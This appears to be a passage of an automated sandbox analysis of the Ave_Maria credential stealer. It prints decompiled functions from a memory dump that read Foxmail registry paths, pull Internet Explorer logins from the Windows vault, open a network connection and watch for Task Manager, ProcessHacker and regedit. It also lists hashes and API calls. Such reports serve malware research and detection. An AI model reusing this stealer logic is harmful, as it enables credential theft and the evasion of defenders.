                                  • C:\Users\Vitali Kremez\Documents\MidgetPorn\workspace\MsgBox.exe, xrefs: 004120CD
                                  • Bla2, xrefs: 00412086, 0041208C, 0041208D
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$CreateFreeMessageProcessVirtuallstrcmplstrcpy
                                  • String ID: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper$Bla2$C:\Users\Vitali Kremez\Documents\MidgetPorn\workspace\MsgBox.exe$VirtualQuery
                                  • API String ID: 1196126833-2308542105
                                  • Opcode ID: 3b9f17e5ee25b29376746fec1db752dd3733cf3cace8c00c7f8d8b87597a7d89
                                  • Instruction ID: b002b8fab82c5f8035800c071d4aecb67a577e28dec50426e7e7b6f2e11e6f57
                                  • Opcode Fuzzy Hash: 3b9f17e5ee25b29376746fec1db752dd3733cf3cace8c00c7f8d8b87597a7d89
                                  • Instruction Fuzzy Hash: C2113D71A40119BACB08EBA5D956CEF7B7CAE08704B10416FB502B2181DF785F85D6A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040C5E8(void* __ecx) {
                                  				void* _t13;
                                  				void* _t25;
                                  
                                  				_t25 = __ecx;
                                  				if(__ecx != 0) {
                                  					if( *(__ecx + 0x30) != 0) {
                                  						LocalFree( *(__ecx + 0x30));
                                  					}
                                  					if( *(_t25 + 0x40) != 0) {
                                  						LocalFree( *(_t25 + 0x40));
                                  					}
                                  					if( *(_t25 + 0x48) != 0) {
                                  						LocalFree( *(_t25 + 0x48));
                                  					}
                                  					if( *(_t25 + 0x58) != 0) {
                                  						LocalFree( *(_t25 + 0x58));
                                  					}
                                  					if( *(_t25 + 0x60) != 0) {
                                  						LocalFree( *(_t25 + 0x60));
                                  					}
                                  					if( *(_t25 + 0x68) != 0) {
                                  						LocalFree( *(_t25 + 0x68));
                                  					}
                                  					return LocalFree(_t25);
                                  				}
                                  				return _t13;
			}

                                  0x0040c5e9
                                  0x0040c5ed
                                  0x0040c5fa
                                  0x0040c5ff
                                  0x0040c5ff
                                  0x0040c605
                                  0x0040c60a
                                  0x0040c60a
                                  0x0040c610
                                  0x0040c615
                                  0x0040c615
                                  0x0040c61b
                                  0x0040c620
                                  0x0040c620
                                  0x0040c626
                                  0x0040c62b
                                  0x0040c62b
                                  0x0040c631
                                  0x0040c636
                                  0x0040c636
                                  0x00000000
                                  0x0040c63b
                                  0x0040c63d

                                  APIs
                                  • LocalFree.KERNEL32(?,00000000,00000000,0040C25A), ref: 0040C5FF
                                  • LocalFree.KERNEL32(?,00000000,00000000,0040C25A), ref: 0040C60A
                                  • LocalFree.KERNEL32(?,00000000,00000000,0040C25A), ref: 0040C615
                                  • LocalFree.KERNEL32(?,00000000,00000000,0040C25A), ref: 0040C620
                                  • LocalFree.KERNEL32(?,00000000,00000000,0040C25A), ref: 0040C62B
                                  • LocalFree.KERNEL32(?,00000000,00000000,0040C25A), ref: 0040C636
                                  • LocalFree.KERNEL32(00000000,00000000,00000000,0040C25A), ref: 0040C639
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FreeLocal
                                  • String ID:
                                  • API String ID: 2826327444-0
                                  • Opcode ID: e210eac78a67af8d765b371b2a8cef4c1561b11a820ce277a8fed05558fb2678
                                  • Instruction ID: 62e6c422cf591d6120044b1c94743719a7044ae546b32db2f753074c0c434ab8
                                  • Opcode Fuzzy Hash: e210eac78a67af8d765b371b2a8cef4c1561b11a820ce277a8fed05558fb2678
                                  • Instruction Fuzzy Hash: 6BF0EC30011B14DBD7326B26CC447A7B6A1BF80305F151E3AD08121AB0C77AA896DF48
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004094FF(void* __ecx) {
                                  				int _v8;
                                  				void* _v12;
                                  				void* _t7;
                                  
                                  				if(RegOpenKeyExA(0x80000001, "software\\Aerofox\\FoxmailPreview", 0, 0x20019,  &_v12) != 0) {
                                  					L3:
                                  					_t7 = 0;
                                  				} else {
                                  					_v8 = 0x104;
                                  					if(RegQueryValueExA(_v12, "Executable", 0, 0, 0x426868,  &_v8) != 0) {
                                  						goto L3;
                                  					} else {
                                  						PathRemoveFileSpecA(0x426868);
                                  						_t7 = 1;
                                  					}
                                  				}
                                  				return _t7;
                                  			}


                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000001,software\Aerofox\FoxmailPreview,00000000,00020019,?), ref: 0040951A
                                  • RegQueryValueExA.ADVAPI32(?,Executable,00000000,00000000,00426868,?), ref: 00409541
                                  • PathRemoveFileSpecA.SHLWAPI(00426868), ref: 0040954C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FileOpenPathQueryRemoveSpecValue
                                  • String ID: Executable$software\Aerofox\FoxmailPreview
                                  • API String ID: 3687894118-2371247776
                                  • Opcode ID: 00374a71c6d41edaef1c2e71d7d119052920faecd5ef0eb5d90ed42a0cf43a85
                                  • Instruction ID: da810012986fcb6c8d8d394bbe01705385cba6e4fa72d30e5428379b1b1cd6da
                                  • Opcode Fuzzy Hash: 00374a71c6d41edaef1c2e71d7d119052920faecd5ef0eb5d90ed42a0cf43a85
                                  • Instruction Fuzzy Hash: 59F0A7B5784304BAEB509B46DC46FDB3BBC9755B04F200079BA05B11C2D2B49A45952C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 50%
                                  			E0041046E(intOrPtr __ecx) {
                                  				char _v5;
                                  				char _v12;
                                  				signed int _v16;
                                  				signed int _v20;
                                  				intOrPtr _v24;
                                  				intOrPtr _v28;
                                  				void _v32;
                                  				signed int _v36;
                                  				long _v40;
                                  				char _v49;
                                  				char _v52;
                                  				intOrPtr _v72;
                                  				char _v76;
                                  				char _v80;
                                  				void _v84;
                                  				char _v100;
                                  				char _v2156;
                                  				void* _t61;
                                  				char _t64;
                                  				intOrPtr _t70;
                                  				signed int _t77;
                                  				void* _t87;
                                  				void* _t95;
                                  				void* _t99;
                                  				signed int _t100;
                                  				signed int _t102;
                                  				void* _t111;
                                  				signed int _t115;
                                  				void* _t119;
                                  				intOrPtr _t123;
                                  				void* _t133;
                                  				void* _t134;
                                  				void* _t137;
                                  
                                  				 *0x559cac = __ecx;
                                  				while(1) {
                                  					_t61 = E0041075C( &_v100);
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					if( *0x426755 == 0) {
                                  						break;
                                  					}
                                  					_t99 = 0xc;
                                  					_v5 = 0;
                                  					_t95 = E00406099(_t99);
                                  					if(_t95 == 0) {
                                  						_t95 = 0;
                                  					} else {
                                  						asm("stosd");
                                  						asm("stosd");
                                  						asm("stosd");
                                  					}
                                  					_t100 = _v32;
                                  					_t3 = 0x426980 + _t100 * 0xc; // 0x426980
                                  					_t119 = _t3;
                                  					if( *_t119 != _t100) {
                                  						_t64 = _v5;
                                  					} else {
                                  						_t64 = 1;
                                  						_t95 = _t119;
                                  					}
                                  					if(_t64 != 0) {
                                  						if( *((char*)(_t95 + 4)) != 1) {
                                  							_t130 = _v24;
                                  							__imp__#19( *(_t95 + 8), _v24, _v28, 0);
                                  						} else {
                                  							E00401052( &_v2156, 0, 0x802);
                                  							_v20 = _v20 & 0;
                                  							_v16 = _v16 & 0;
                                  							_t102 = 8;
                                  							memset( &_v84, 0, _t102 << 2);
                                  							_t137 = _t137 + 0x18;
                                  							asm("stosd");
                                  							asm("stosd");
                                  							asm("stosw");
                                  							_t123 = _v24;
                                  							_t70 =  *((intOrPtr*)(_t123 + 3));
                                  							if(_t70 != 1) {
                                  								if(_t70 != 3) {
                                  									if(_t70 == 4) {
                                  										__imp__InetNtopW(0x17, _t123 + 4,  &_v2156, 0x802);
                                  										_t77 = E0041085B(_t123 + 4,  *(_t123 + 8) & 0x0000ffff);
                                  										goto L18;
                                  									}
                                  								} else {
                                  									E00401052( &_v84, 0, 0x20);
                                  									_v80 = 2;
                                  									_v76 = 1;
                                  									_v72 = 6;
                                  									_t133 = E00401085(0x200);
                                  									E0040102C(_t133, _t123 + 5,  *((char*)(_t123 + 4)));
                                  									_v36 = _v36 & 0x00000000;
                                  									E0040102C( *((char*)(_t123 + 4)) + _t133,  &_v36, 1);
                                  									_t137 = _t137 + 0x28;
                                  									_t87 =  &_v84;
                                  									__imp__getaddrinfo(_t133, 0, _t87,  &_v20);
                                  									if(_t87 == 0) {
                                  										_t115 =  *( *((char*)(_t123 + 4)) + _t123 + 5) & 0x0000ffff;
                                  										_t111 =  *((intOrPtr*)(_v20 + 0x18)) + 4;
                                  										goto L12;
                                  									}
                                  								}
                                  							} else {
                                  								_t134 = _t123 + 4;
                                  								__imp__InetNtopW(2, _t134,  &_v2156, 0x802);
                                  								_t115 =  *(_t123 + 8) & 0x0000ffff;
                                  								_t111 = _t134;
                                  								L12:
                                  								_t77 = E004108DC(_t111, _t115);
                                  								L18:
                                  								_v16 = _t77;
                                  							}
                                  							_v52 = 5;
                                  							_v49 = 1;
                                  							E004106F9( &_v52, 0xa, _v32);
                                  							 *(_t95 + 8) = _v16;
                                  							 *((char*)(_t95 + 4)) = 2;
                                  							_v40 = 0;
                                  							asm("movsd");
                                  							asm("movsd");
                                  							asm("movsd");
                                  							CreateThread(0, 0, E0041068D, _t95, 0,  &_v40);
                                  							_t130 = _v24;
                                  						}
                                  						E00401099(_t130);
                                  					} else {
                                  						_v12 = 5;
                                  						E004106F9( &_v12, 2, _t100);
                                  						 *((char*)(_t95 + 4)) = 1;
                                  						 *_t95 = _v32;
                                  						asm("movsd");
                                  						asm("movsd");
                                  						asm("movsd");
                                  					}
                                  				}
                                  				return _t61;
                                  			}


                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: recv
                                  • String ID:
                                  • API String ID: 1507349165-0
                                  • Opcode ID: b5c0599b6a21f609f48be6335f6a61c6e2d9c779c1fd2f504f0cb0282a1048da
                                  • Instruction ID: a997fb7a83d2290818e28b31fbf57bc7f8b037a2cfd84f52b4588474c50995db
                                  • Opcode Fuzzy Hash: b5c0599b6a21f609f48be6335f6a61c6e2d9c779c1fd2f504f0cb0282a1048da
                                  • Instruction Fuzzy Hash: 8961D871904218EEDB10CF95CC45BEFB7B9BF04304F00816AF945BB281D7B9A985CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040F086() {
                                  				signed int _v8;
                                  				char _v12;
                                  				signed int _v16;
                                  				char _v20;
                                  				signed int _v24;
                                  				signed int _v28;
                                  				signed int _v32;
                                  				void* _t26;
                                  				void* _t29;
                                  				signed int _t32;
                                  				signed int _t35;
                                  				void* _t42;
                                  				void* _t56;
                                  				void* _t58;
                                  				void* _t59;
                                  				signed int _t60;
                                  				signed int _t61;
                                  				signed int _t62;
                                  				void* _t64;
                                  
                                  				_t64 = (_t62 & 0xfffffff8) - 0x1c;
                                  				_t42 = 0;
                                  				_v16 = _v16 & 0;
                                  				_t56 = 0;
                                  				_v8 = _v8 & 0;
                                  				L1:
                                  				_t26 = E00412155(E004036F7( &_v28, L"explorer.exe"));
                                  				_t45 = _v32;
                                  				_t58 = _t26;
                                  				E00405FEB(_v32);
                                  				_v32 = _v32 & 0x00000000;
                                  				if(_t58 != 0 && _t58 != _t56) {
                                  					_t56 = _t58;
                                  					E00407B2E(_t45, _t45, _t58);
                                  					_t64 = _t64 + 0xc;
                                  				}
                                  				_t29 = E00412155(E004036F7( &_v24, L"TASKmgr.exe"));
                                  				_t48 = _v28;
                                  				_t59 = _t29;
                                  				E00405FEB(_v28);
                                  				_v28 = _v28 & 0x00000000;
                                  				if(_t59 != 0 && _t59 != _t42) {
                                  					_t42 = _t59;
                                  					E00407B2E(_t48, _t48, _t59);
                                  					_t64 = _t64 + 0xc;
                                  				}
                                  				_t32 = E00412155(E004036F7( &_v20, L"ProcessHacker.exe"));
                                  				_t51 = _v24;
                                  				_t60 = _t32;
                                  				E00405FEB(_v24);
                                  				_v24 = _v24 & 0x00000000;
                                  				if(_t60 != 0 && _t60 != _v16) {
                                  					_v16 = _t60;
                                  					E00407B2E(_t51, _t51, _t60);
                                  					_t64 = _t64 + 0xc;
                                  				}
                                  				_t35 = E00412155(E004036F7( &_v12, L"regedit.exe"));
                                  				_t54 = _v16;
                                  				_t61 = _t35;
                                  				E00405FEB(_v16);
                                  				_v16 = _v16 & 0x00000000;
                                  				if(_t61 != 0 && _t61 != _v8) {
                                  					_v8 = _t61;
                                  					E00407B2E(_t54, _t54, _t61);
                                  					_t64 = _t64 + 0xc;
                                  				}
                                  				Sleep(0x3e8);
                                  				goto L1;
                                  			}


                                  APIs
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                    • Part of subcall function 00412155: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00412170
                                    • Part of subcall function 00412155: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00412185
                                    • Part of subcall function 00412155: CloseHandle.KERNEL32(00000000), ref: 004121C1
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  • Sleep.KERNEL32(000003E8), ref: 0040F193
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$CloseCreateFirstFreeHandleProcess32SleepSnapshotToolhelp32Virtuallstrcpy
                                  • String ID: ProcessHacker.exe$TASKmgr.exe$explorer.exe$regedit.exe
                                  • API String ID: 1522922855-2180853415
                                  • Opcode ID: 7173c65b3d221aa96aaa846a7a9ffc8452488f4e1cccf0dcc11cdd1b8507cc7e
                                  • Instruction ID: 1100a8f027d8646bfe9cbc7498619969e67dd2afa5e15d5111ff53f3380e378b
                                  • Opcode Fuzzy Hash: 7173c65b3d221aa96aaa846a7a9ffc8452488f4e1cccf0dcc11cdd1b8507cc7e
                                  • Instruction Fuzzy Hash: 6321C471D053516BC724FF21C946AAFB6949F84759F040A3EF844733C2EA7CAE09C69A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • socket.WS2_32(00000002,00000001,00000006), ref: 004103D3
                                  • gethostbyname.WS2_32(?), ref: 004103DC
                                  • htons.WS2_32(?), ref: 00410400
                                  • InetNtopW.WS2_32(00000002,?,?,00000802), ref: 00410431
                                  • connect.WS2_32(00000000,?,00000010), ref: 0041044A
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: InetNtopconnectgethostbynamehtonssocket
                                  • String ID:
                                  • API String ID: 2393792429-0
                                  • Opcode ID: c85bbde7853d1e0dd836cd2d5e75085cc4800a1032bbd5787e48c5e879d75bec
                                  • Instruction ID: 727c1264bc9e30e98f597feacc0b668f5efde6c0f62ffec738b6da8cc58ee6c9
                                  • Opcode Fuzzy Hash: c85bbde7853d1e0dd836cd2d5e75085cc4800a1032bbd5787e48c5e879d75bec
                                  • Instruction Fuzzy Hash: 851103B2900258BBE71097A4AC4AFEB7BBCEF05724F008476FD55D7191E6B4894487A4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0041221F(signed int* __ecx, void* __edx) {
                                  				char _v524;
                                  				intOrPtr _v552;
                                  				void* _v560;
                                  				struct tagPROCESSENTRY32W* _t8;
                                  				void* _t14;
                                  				void* _t18;
                                  				signed int* _t19;
                                  
                                  				_t14 = __edx;
                                  				_v560 = 0x22c;
                                  				_t19 = __ecx;
                                  				_t18 = CreateToolhelp32Snapshot(2, 0);
                                  				if(_t18 == 0xffffffff) {
                                  					L6:
                                  					 *_t19 =  *_t19 & 0x00000000;
                                  				} else {
                                  					_t8 =  &_v560;
                                  					Process32FirstW(_t18, _t8);
                                  					while(_t8 != 0) {
                                  						if(_v552 == _t14) {
                                  							CloseHandle(_t18);
                                  							E004036F7(_t19,  &_v524);
                                  						} else {
                                  							_t8 = Process32NextW(_t18,  &_v560);
                                  							continue;
                                  						}
                                  						goto L7;
                                  					}
                                  					CloseHandle(_t18);
                                  					goto L6;
                                  				}
                                  				L7:
                                  				return _t19;
                                  			}


                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041223D
                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00412252
                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0041226A
                                  • CloseHandle.KERNEL32(00000000), ref: 00412275
                                  • CloseHandle.KERNEL32(00000000), ref: 00412286
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
                                  • String ID:
                                  • API String ID: 1789362936-0
                                  • Opcode ID: e32333b86ea98e8debf8d87e9ca123abf85733d7f1adc30fc4469acb21f4305d
                                  • Instruction ID: debd20abf717d3e205526d08b8a6d3eb8db8cce60d0d25a78bdd72c07f1bd50f
                                  • Opcode Fuzzy Hash: e32333b86ea98e8debf8d87e9ca123abf85733d7f1adc30fc4469acb21f4305d
                                  • Instruction Fuzzy Hash: BE01D6312042147BCB205BA4AC4DBFE77BCAB48761F1080AAF505D2290D7B889828A6D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040B10E(void* __ecx) {
                                  				int _t15;
                                  				void* _t18;
                                  
                                  				_t18 = __ecx;
                                  				FreeLibrary( *(__ecx + 0xb4));
                                  				 *((intOrPtr*)(_t18 + 0xb4)) = 0;
                                  				FreeLibrary( *(_t18 + 0xa8));
                                  				 *(_t18 + 0xa8) = 0;
                                  				FreeLibrary( *(_t18 + 0xac));
                                  				 *(_t18 + 0xac) = 0;
                                  				FreeLibrary( *(_t18 + 0xb8));
                                  				 *(_t18 + 0xb8) = 0;
                                  				_t15 = FreeLibrary( *(_t18 + 0xb0));
                                  				 *(_t18 + 0xb0) = 0;
                                  				return _t15;
                                  			}

                                  APIs
                                  • FreeLibrary.KERNEL32(?,00000001,?,00000000,0040A897), ref: 0040B11F
                                  • FreeLibrary.KERNEL32(?,?,00000000,0040A897), ref: 0040B12F
                                  • FreeLibrary.KERNEL32(?,?,00000000,0040A897), ref: 0040B13D
                                  • FreeLibrary.KERNEL32(?,?,00000000,0040A897), ref: 0040B14B
                                  • FreeLibrary.KERNEL32(?,?,00000000,0040A897), ref: 0040B159
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FreeLibrary
                                  • String ID:
                                  • API String ID: 3664257935-0
                                  • Opcode ID: 210cf7db4e8693dd847fcff9086375174805dd290c5ac6837b92d1c909e8ac8a
                                  • Instruction ID: 9f7ef04137cd162203068e8b633458ffaa87eefdd020305409dbc26cee2ce42b
                                  • Opcode Fuzzy Hash: 210cf7db4e8693dd847fcff9086375174805dd290c5ac6837b92d1c909e8ac8a
                                  • Instruction Fuzzy Hash: 7AF0A571B04B16BED7495F758C84B86FE6AFF49260F01462B952C42221CB716434DFD2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040AD8C(void* __ecx) {
                                  				int _t15;
                                  				void* _t18;
                                  
                                  				_t18 = __ecx;
                                  				FreeLibrary( *(__ecx + 0xb4));
                                  				 *((intOrPtr*)(_t18 + 0xb4)) = 0;
                                  				FreeLibrary( *(_t18 + 0xa8));
                                  				 *(_t18 + 0xa8) = 0;
                                  				FreeLibrary( *(_t18 + 0xac));
                                  				 *(_t18 + 0xac) = 0;
                                  				FreeLibrary( *(_t18 + 0xb8));
                                  				 *(_t18 + 0xb8) = 0;
                                  				_t15 = FreeLibrary( *(_t18 + 0xb0));
                                  				 *(_t18 + 0xb0) = 0;
                                  				return _t15;
                                  			}

                                  APIs
                                  • FreeLibrary.KERNEL32(?,?,?,00000000,0040A344), ref: 0040AD9D
                                  • FreeLibrary.KERNEL32(?,?,?,00000000,0040A344), ref: 0040ADAD
                                  • FreeLibrary.KERNEL32(?,?,?,00000000,0040A344), ref: 0040ADBB
                                  • FreeLibrary.KERNEL32(?,?,?,00000000,0040A344), ref: 0040ADC9
                                  • FreeLibrary.KERNEL32(?,?,?,00000000,0040A344), ref: 0040ADD7
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FreeLibrary
                                  • String ID:
                                  • API String ID: 3664257935-0
                                  • Opcode ID: 210cf7db4e8693dd847fcff9086375174805dd290c5ac6837b92d1c909e8ac8a
                                  • Instruction ID: 9f7ef04137cd162203068e8b633458ffaa87eefdd020305409dbc26cee2ce42b
                                  • Opcode Fuzzy Hash: 210cf7db4e8693dd847fcff9086375174805dd290c5ac6837b92d1c909e8ac8a
                                  • Instruction Fuzzy Hash: 7AF0A571B04B16BED7495F758C84B86FE6AFF49260F01462B952C42221CB716434DFD2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 61%
                                  			E0040A968(void* __ecx, void* __edx, void* __eflags) {
                                  				char _v8;
                                  				char _v12;
                                  				char _v16;
                                  				char _v20;
                                  				char _v24;
                                  				intOrPtr _v28;
                                  				char _v32;
                                  				char _v36;
                                  				char _v40;
                                  				char _v44;
                                  				char _v48;
                                  				char _v52;
                                  				char _v56;
                                  				char _v60;
                                  				char _v64;
                                  				char _v68;
                                  				char _v72;
                                  				char _v76;
                                  				char _v80;
                                  				char _v84;
                                  				char _v92;
                                  				char _v96;
                                  				char _v100;
                                  				void* _t124;
                                  				void* _t127;
                                  				intOrPtr _t129;
                                  				void* _t133;
                                  				intOrPtr _t147;
                                  				void* _t148;
                                  				void* _t159;
                                  				void* _t162;
                                  				void* _t186;
                                  				char _t226;
                                  				intOrPtr _t229;
                                  				char _t234;
                                  				void* _t235;
                                  
                                  				_t234 = 0;
                                  				_t186 = __ecx;
                                  				_t226 = 0;
                                  				_v16 = 0;
                                  				_v44 = 0;
                                  				_v20 = 0;
                                  				_v12 = 0;
                                  				_v8 = 0;
                                  				_v84 = 0;
                                  				if(E0040ACBE(__ecx) != 0) {
                                  					_push( &_v16);
                                  					_push(0);
                                  					_push(0x41c150);
                                  					if( *((intOrPtr*)(__ecx + 0x8c))() == 0) {
                                  						_push( &_v20);
                                  						_push( &_v44);
                                  						_push(0x200);
                                  						_push(_v16);
                                  						if( *((intOrPtr*)(__ecx + 0x94))() == 0) {
                                  							_t240 = _v44;
                                  							if(_v44 != 0) {
                                  								_v80 = 0;
                                  								_v40 = 0;
                                  								_v36 = 0;
                                  								do {
                                  									_t124 = E0040AC8B(_t240);
                                  									_push(0x10);
                                  									_push(0x41c140);
                                  									if(_t124 == 0) {
                                  										_push(_t226);
                                  										_v28 = _v20 + _v40;
                                  										_t127 = E00401000();
                                  										_t235 = _t235 + 0xc;
                                  										__eflags = _t127;
                                  										if(__eflags == 0) {
                                  											E004036F7( &_v32,  *((intOrPtr*)(_v28 + 0x10)));
                                  											_t133 = E0040335A( &_v32, E004036F7( &_v64, L"Internet Explorer"));
                                  											E00405FEB(_v64);
                                  											_v64 = _t234;
                                  											__eflags = _t133;
                                  											if(__eflags != 0) {
                                  												asm("movaps xmm0, [0x41a910]");
                                  												asm("movups [ebp-0x60], xmm0");
                                  												E00403549( &_v100, E004036F7( &_v68,  *((intOrPtr*)(_v8 + 0x14)) + 0x20));
                                  												E00405FEB(_v68);
                                  												_v68 = _t234;
                                  												E00403549( &_v96, E004036F7( &_v72,  *((intOrPtr*)(_v8 + 0x18)) + 0x20));
                                  												E00405FEB(_v72);
                                  												_v12 = _t234;
                                  												_t147 = _v28;
                                  												_v72 = _t234;
                                  												_t148 =  *((intOrPtr*)(_t186 + 0x98))(_v16, _t147,  *((intOrPtr*)(_t147 + 0x14)),  *((intOrPtr*)(_t147 + 0x18)), _t234, _t234, _t234,  &_v12);
                                  												__eflags = _t148;
                                  												if(_t148 == 0) {
                                  													_v8 = _v12;
                                  													__eflags =  *((intOrPtr*)(_v28 + 0x1c)) + 0x20;
                                  													E00403549( &_v84, E004036F7( &_v76,  *((intOrPtr*)(_v28 + 0x1c)) + 0x20));
                                  													E00405FEB(_v76);
                                  													_v76 = _t234;
                                  												}
                                  												_t235 = _t235 - 0x10;
                                  												E00401FF2(_t235,  &_v100);
                                  												E00402028(_t186);
                                  												E00401441( &_v100);
                                  											}
                                  											E00405FEB(_v32);
                                  											_v32 = _t234;
                                  											goto L18;
                                  										}
                                  									} else {
                                  										_t226 = _v36 + _v20;
                                  										_push(_t226);
                                  										_v8 = _t226;
                                  										_t159 = E00401000();
                                  										_t235 = _t235 + 0xc;
                                  										if(_t159 == 0) {
                                  											E004036F7( &_v24,  *((intOrPtr*)(_t226 + 0x10)));
                                  											_t162 = E0040335A( &_v24, E004036F7( &_v48, L"Internet Explorer"));
                                  											E00405FEB(_v48);
                                  											_v48 = _t234;
                                  											if(_t162 != 0) {
                                  												_t229 = _v8;
                                  												asm("movaps xmm0, [0x41a910]");
                                  												asm("movups [ebp-0x60], xmm0");
                                  												E00403549( &_v100, E004036F7( &_v52,  *((intOrPtr*)(_t229 + 0x14)) + 0x20));
                                  												E00405FEB(_v52);
                                  												_v52 = _t234;
                                  												E00403549( &_v96, E004036F7( &_v56,  *((intOrPtr*)(_t229 + 0x18)) + 0x20));
                                  												E00405FEB(_v56);
                                  												_v12 = _t234;
                                  												_push( &_v12);
                                  												_push(_t234);
                                  												_push(_t234);
                                  												_push(_t234);
                                  												_push( *((intOrPtr*)(_t229 + 0x18)));
                                  												_v56 = _t234;
                                  												_push( *((intOrPtr*)(_t229 + 0x14)));
                                  												_push(_t229);
                                  												_push(_v16);
                                  												if( *((intOrPtr*)(_t186 + 0x98))() == 0) {
                                  													_v8 = _v12;
                                  													E00403549( &_v92, E004036F7( &_v60,  *((intOrPtr*)(_v12 + 0x1c)) + 0x20));
                                  													E00405FEB(_v60);
                                  													_v60 = _t234;
                                  												}
                                  												_t235 = _t235 - 0x10;
                                  												E00401FF2(_t235,  &_v100);
                                  												E00402028(_t186);
                                  												E00401441( &_v100);
                                  											}
                                  											E00405FEB(_v24);
                                  											_v24 = _t234;
                                  											L18:
                                  											_t226 = _v8;
                                  										}
                                  									}
                                  									_v36 = _v36 + 0x38;
                                  									_t129 = _v80 + 1;
                                  									_v40 = _v40 + 0x34;
                                  									_v80 = _t129;
                                  								} while (_t129 < _v44);
                                  								_t234 = _v84;
                                  							}
                                  						}
                                  					}
                                  				}
                                  				if(_v20 != 0) {
                                  					 *((intOrPtr*)(_t186 + 0xa0))(_v20);
                                  				}
                                  				if(_v16 != 0) {
                                  					 *((intOrPtr*)(_t186 + 0x90))( &_v16);
                                  				}
                                  				FreeLibrary( *(_t186 + 0xc0));
                                  				E00405FEB(_t234);
                                  				E00405FEB(0);
                                  				return E00405FEB(0);
                                  			}

                                  APIs
                                    • Part of subcall function 0040ACBE: LoadLibraryA.KERNEL32(vaultcli.dll), ref: 0040ACC6
                                  • FreeLibrary.KERNEL32(?), ref: 0040AC6B
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                    • Part of subcall function 0040335A: lstrcmpW.KERNEL32(?,?), ref: 00403364
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                    • Part of subcall function 00403549: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040356E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FreeLibrarylstrcpylstrlen$LoadVirtuallstrcmp
                                  • String ID: 4$8$Internet Explorer
                                  • API String ID: 708496175-747916358
                                  • Opcode ID: f0b137eeb553d2f1686f0a6703045c04bc83a72f38a3950f8389df93ccf35f68
                                  • Instruction ID: a99aea2a735c9718559e27865e5f0cd770b9fcd1e9f38770a9e7eda6b777dcf3
                                  • Opcode Fuzzy Hash: f0b137eeb553d2f1686f0a6703045c04bc83a72f38a3950f8389df93ccf35f68
                                  • Instruction Fuzzy Hash: 98A13D70D00219ABCF14EFA6CC869EEBB79FF04708F14442AF401B7291DB78AA55CB58
